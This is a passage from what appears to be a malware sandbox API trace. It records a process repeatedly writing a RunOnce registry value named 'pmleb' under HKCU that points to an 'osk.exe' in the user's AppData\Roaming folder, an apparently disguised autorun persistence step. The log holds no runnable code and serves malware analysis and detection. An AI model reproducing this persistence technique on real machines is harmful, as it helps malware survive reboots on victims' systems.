pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.110] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x60 [0082.110] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.110] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.110] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.110] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.110] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.110] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.111] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.111] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0082.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.111] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.111] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.111] RegCloseKey (hKey=0x280) returned 0x0 [0082.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.111] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.111] SetTimer (hWnd=0x20280, nIDEvent=0x20dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20dc [0082.111] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.124] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.124] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.124] KillTimer (hWnd=0x20280, uIDEvent=0x20dc) returned 1 [0082.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.124] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.124] IUnknown:Release (This=0x787518) returned 0x1 [0082.124] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0082.125] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.125] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.125] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.125] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0082.146] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.146] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0082.146] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.147] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0082.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.147] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.147] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.147] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.147] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.148] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.148] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.148] RegCloseKey (hKey=0x280) returned 0x0 [0082.148] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.148] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.148] SetTimer (hWnd=0x20280, nIDEvent=0x20dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20dd [0082.148] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.155] KillTimer (hWnd=0x20280, uIDEvent=0x20dd) returned 1 [0082.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.156] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.156] IUnknown:Release (This=0x787518) returned 0x1 [0082.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.156] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.156] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.156] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.156] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.156] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0082.156] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.157] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0082.157] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.157] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 
[0082.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.157] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.157] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.158] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.158] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.158] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.158] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.158] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.158] RegCloseKey (hKey=0x280) returned 0x0 [0082.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.158] SetTimer (hWnd=0x20280, nIDEvent=0x20de, uElapse=0xa, lpTimerFunc=0x0) returned 0x20de [0082.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.171] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.171] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.171] KillTimer (hWnd=0x20280, uIDEvent=0x20de) returned 1 [0082.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.171] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.171] IUnknown:Release (This=0x787518) returned 0x1 [0082.171] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.171] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.172] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.172] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.172] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.172] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0082.172] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.172] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0082.172] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, 